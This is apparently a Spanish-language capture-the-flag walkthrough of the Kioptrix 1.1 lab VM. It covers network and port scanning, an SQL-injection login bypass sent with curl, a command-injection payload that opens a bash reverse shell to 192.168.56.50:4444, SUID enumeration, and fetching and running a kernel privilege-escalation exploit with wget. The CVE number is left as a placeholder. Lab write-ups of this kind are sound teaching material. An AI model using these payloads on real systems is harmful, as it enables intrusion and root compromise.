Análisis y Explotación del Laboratorio Kioptrix 1.1

Configuración del Entorno

Para preparar el laboratorio, elimine las entradas de configuración relacionadas con ethernet0 en el archivo con extensión .vmx antes de la importación. Luego, importe la máquina virtual y asigne un adaptador de red.

Reconocimiento Inicial

Identificación de la dirección IP del objetivo mediente escaneo de red local:

netdiscover -r 192.168.56.0/24 -P

Salida esperada mostrando hosts activos, incluyendo el objetivo en 192.168.56.102.

Enumeración de Servicios

Escaneo de todos los puertos TCP para detectar servicios expuestos:

nmap -sS -p- --open --min-rate 5000 192.168.56.102 -oN full_scan.txt

Resultado: puertos abiertos en 22 (SSH), 80 (HTTP), 111 (RPC), 443 (HTTPS), 631 (IPP), 773 (status), 3306 (MySQL).

Análisis Detallado de Puertos

Escaneo con detección de versiones y scripts por defecto:

nmap -sV -sC -p22,80,111,443,631,773,3306 192.168.56.102 -oX service_scan.xml

Versiones detectadas: OpenSSH 3.9p1, Apache httpd 2.0.52, CUPS 1.1, MySQL no autorizado.

Escaneo de Vulnerabilidades

Ejecución de scripts de vulnerabilidad comunes:

nmap --script vuln -p22,80,111,443,631,773,3306 192.168.56.102

Debilidades encontradas: Slowloris DoS, inyección CCS en SSL, vulnerabilidad POODLE, cifrados débiles DH.

Exploración del Servicio Web

Búsqueda de directorios y archivos ocultos en el servidor HTTP:

dirb http://192.168.56.102/ -o dirb_results.txt -r

Rutas interesantes: /manual/, /icons/, /cgi-bin/.

Explotación mediante Inyección SQL

Acceso al panel de autenticación con credenciales manipuladas:

curl -X POST http://192.168.56.102/index.php -d "user=admin&pass=1' OR '1'='1&btnSubmit=Ingresar"

La inyección evita la vlaidación y permite el acceso al back end.

Ejecución Remota de Comandos

Explotación de funcionalidad vulnerable a través de comandos del sistema:

ping -c 1 127.0.0.1; bash -i >& /dev/tcp/192.168.56.50/4444 0>&1

El uso de separadores como ; permite la ejecución arbitraria de comandos.

Escalamiento de Privilegios

Búsqueda de binarios con permisos SUID:

find / -perm -4000 -type f 2>/dev/null

Listado incluye utilidades como ping, mount, su.

Verificación del kernel y distribución:

uname -a && cat /etc/redhat-release

Kernel: Linux 2.6.9-55.EL, Distribución: CentOS 4.5.

Descarga y compilación de exploit de kernel específico:

wget http://192.168.56.50:8080/exploit.c -O escalation.c
gcc escalation.c -o escalation -static
chmod +x escalation
./escalation

El exploit CVE-2009-XXXX ejecuta código en modo privilegiado, obteniendo acceso root.

Etiquetas: nmap sql-injection apache-2.0 centos-4.5 openssh

Publicado el 6-22 06:38

Etiquetas populares

©2026 Friki Work